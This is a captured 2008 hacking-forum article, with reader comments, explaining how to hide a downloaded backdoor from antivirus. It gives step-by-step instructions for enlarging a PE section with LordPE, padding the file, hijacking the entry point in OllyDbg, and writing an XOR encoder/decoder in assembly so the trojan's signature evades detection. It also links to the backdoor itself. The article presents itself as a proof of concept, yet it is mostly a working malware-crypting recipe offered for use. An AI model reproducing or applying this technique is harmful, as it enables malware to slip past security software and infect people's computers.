842 evading anti virus detection

8/3/2019 842 Evading Anti Virus Detection

1/9

* Home * Discussion Forum

* Forgotten Password * Register

HellBound Hackers

Join us at IRC! One mans freedom fighter, another's terrorist.Wednesday, December 21, 2011Navigation*Home*HellBoundHackers *Main:*

* Home / News

HellBoundHackers *Find:*

* Search

* Members

HellBoundHackers *Information:*

* Development * Newsletters * HBH Services * Media * Info for Schools

HellBoundHackers *Additional:*

* Userbar

* FAQ * Advertise * Contact HBH * Disclaimer

*Shop*

* Exclusive Membership

*Learn*

* Articles

* Lessons * Code Bank

*Communicate*

* Discussion Forum * HBH irc

*Submit*

* Submit News * Submit Link * Submit Article

* Submit Code * Submit Bug


2/9

*Challenges*

* Rankings * Challenge Points

HellBoundHackers *Exploit:*

* Basic Web Hacking * Application Cracking * Javascript Hacking * Realistic Challenges * Rooting Challenges * Flash Challenges * Pen-Testing Challenges

HellBoundHackers *Programming:*

* Timed Challenges

HellBoundHackers *Think:*

* Encryption * Logical * Stegano

HellBoundHackers *Track:*

* Tracking

HellBoundHackers *Patch:*

* Web Patching

* App Patching

HellBoundHackers *Other:*

* Other Challenges * S. Engineering

HellBoundHackers *Need Help?*

* HBHBot

*Interact*

* HBH Podcasts * Interview with a Hacker

*Other*HellBoundHackers *Executive:*

* Hall of Fame * Hall of Generosity

HellBoundHackers *Leisure:*

* Urban Defacements

* Link to Us

Members Online


3/9

Total Online: 25Web Spiders: 6Guests Online: 18Members Online: 7rock4ever56 , pangd, Jimbojams , NopPop, Galligator ,

cphackz , Evandta

Registered Members: 65508Newest Member: *Jimbojams*Latest Articles

Mapping Memory...

Javascript 16 *may c...

Advanced DLL Injecti...

Tweaking Firefox Plu...

An Intoduction to Ga...

Positional Number Sy...

Dream Interpretation...

Freewebhosts and sub...


4/9

The Dunning-Kruger E...

Me and my router...

Hardware Hacking Par...

Encryption 11-The si...

Realistic 13...

Uniguest bypass...

javascript16...

Evading Anti Virus Detection

FLV Blaster - Download Music and Videos Faster

website security Learn how to hide your trojans, backdoors, etc fromanti virus.

Hiding backdoors and trojans from antivirus software---------------------------------------------------------

This is a POC on how to evade detection from AV. In this article I willtry toguide you through the generic steps needed for this process, and show you byexample on a specific back door available. This is a POC and not applicableto modern AV. However, the process for developing your own encoding/decodingscheme, so that this will work, is entirely valid.

Programs usedhttp://www.white-scorpion.nl/programs/backdoor.zip -- basic back door


5/9

http://www.4shared.com/file/32660382/3562d77f/LordPE.html -- LordPEhttp://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm -- Hex Editorhttp://www.ollydbg.de/ -- ollydbg

General Overview----------------

We are going to start by increasing the file size of our backdoor givingus roomof our own to write code in. We will then hijack then entry point of theprogram,redirect it to our own encoder. This encoder for the POC will XOR thefile contents,and then jump back to the original starting place. XOR is a reversibleprocess, sothat when saved in this encoded state, the signatures will not matchthose in theAV database. When ran however, the same XOR loop, will decode the programwhile in memory where AV does not affect it.

Lets get started----------------

Note: Your addresses might not match mine exactly, so look at the generalstructure and you will be able to follow along.

Step - 1--------

Open up backdoor.exe (located in the bin folder) in LordPE. LordPE is aportable executable viewer and editor.

-Click on PE editor to open file-Click sections in the new windowHere we see 3 sections .text .rdata and .data. For this example we willselect .data. Right click and select edit section header.-Add 1000 hex bytes to the virtual size and the raw size.VirtualSize = 00001B4ARawSize = 00001200-Click on the (...) next to the flags and set 'Executable as code'. Thisis wherewe will build our encoder/decoder and thus need to have it executed.-Edit the section header for .text as well to writable (also underflags)-Save and close LordPE

Step - 2--------

If you tried to open your backdoor now you will notice an errorindicating it isnot a valid Win32 Application. This is because our sizes do no balance. Weindicated there were an extra 1000 hex bytes, but have not actually addedanything to the program. So we will now pad our program.

-Open it up in XVI32 (or other hex editor of your choice)-Scroll to the end of the file, and this is where we will add our 1000

hex bytes.-Edit > insert (Select Hex String: 00 Insert times - choosehexadecimal $1000)


6/9

This inserts our 1000 bytes needed to write our code in. Now save andclose thehex editor.

If you were to run the backdoor.exe now, you will notice it does work,but still

detected by the antivirus. We have not changed our code, or signature yet.

Step - 3--------Ollydbg: I am going to assume you have a basic understanding of what olly isand how to use a few basic features.

--Preparing for our code injection--

Open the back door and first look at a few things.-Address of the entry point-Address of our 1000 hex bytes (you can select an address anywhere in

this area)

Copy the first few lines of the backdoor.exe to clipboard, and keepavailable innotepad for later reference.

Now scroll down to the padded 00 bytes and choose and address where wewill injectour encoder. For this example I am going to choose address 00401590.

--Altering the code--

First thing we will need to do now, is hijack the ModuleEntryPoint and

redirect it to oursection.

JMP 00401590 #This will force the jump from module entry point to ourcode cave

select this line and save the file. Rightclick > copy to executable >selection. Then save file asbackdoor_v2.exe.

Note if you change the file name from the original like I did, go aheadand close the first andopen up the altered one.

You will now notice the first two lines of code have changed.

00401000 > $ E9 8B050000 JMP backdoor.0040159000401005 . 68 34 31 40 00>ASCII "h41@",0

If you step 1 time in this program now you will notice you end onaddress, 00401590.Now we can begin writing our XOR loop.

MOV EAX, 0040100A # Start of encoding address.XOR BYTE PTR DS: [EAX], 5E # XOR the contents of EAX with the key 5EINC EAX # Increase EAX


7/9

CMP EAX, 004014EB # Tests to see if we've reached the end of our encJLE SHORT 00401595 # If not, jump back to XOR command

After this we need to put the code in that we overwrote at the beginning.

CALL 00401468PUSH 00403134

Then we will jump to the address after the push command. At address 0040100A

JMP 0040100A

At this point we now have the XOR loop written, the following commands,and a return tothe beginning. However we are not quite done yet. Save yourmodifications, and set a breakpoint (f2) after the JLE SHORT command. Now run the program, and it will

stop in at the breakpoint, and the program will now be encoded. Highlight the entire programand again save this file(backdoor_v3.exe).

The program is now entire encoded except the first few lines, and ourcode cave. When this isnow ran, it will again, jump to our XOR loop, decode itself, and thenproceed to function as itwas written.

This article was written by stdio in reference to a demo preformed byMati Aharoni (Muts).

security article Posted by stdio on July 26 2008- 12:26:10 6 Commentsevading-anti-virus-detection.html> 8913 Reads Print print this tutorial

Comments

Uber0n on July 27 2008 - 09:58:10Really interesting and very well written. I'm impressed B)korg on August 19 2008 - 08:15:29Nice job. I have read most of Mati's articles I have found, He has someinteresting topics.Zephyr_Pure on August 29 2008 - 04:17:11It's very rare that I say this... but, that was a damn good article.Showed a great deal of technique and knowledge, while keeping it simple.stdio on August 29 2008 - 17:54:11Thanks for all the kind replies. However I did manage to stumble acrossa more detailed paper describing the same process written after mine.Here's the link if interested: http://www.milw0rm.com/papers/217sam207 on October 17 2008 - 07:07:53very nice one... Thanks a lot for this one..

hellboundhackersok on November 082008 - 21:28:57The backdoor program makes McAfee SiteAdvisor turn red. nice job. ahahah


8/9

Post Comment

*Sorry.*

You must have completed the challenge *Basic 1* and have *100 points* ormore, to be able to post.

RatingsRating is available to members only.

Please login or register to vote.------------------------------------------------------------------------Awesome! 100% [8 Votes]Very Good 0% [No Votes]Good 0% [No Votes]Average 0% [No Votes]Poor 0% [No Votes]

GuestUsername

Password

Remember Me

Bullet Register Bullet Lost Password? Bookmark This Page

AffiliatesPHP-Fusion HackThisSite Elites0ft psych0tik.blog Valhalla Adverts

160 x 600

Links


9/9

Anime Wallpaper Site

By using, viewing or obtaining any information contained on this site,you agree to the disclaimer .

HellBound Hackers 2008- 2009. Since 3rd December 2004.

19231550 Unique Visits

Powered by HBH-Fusion

842 evading anti virus detection

Documents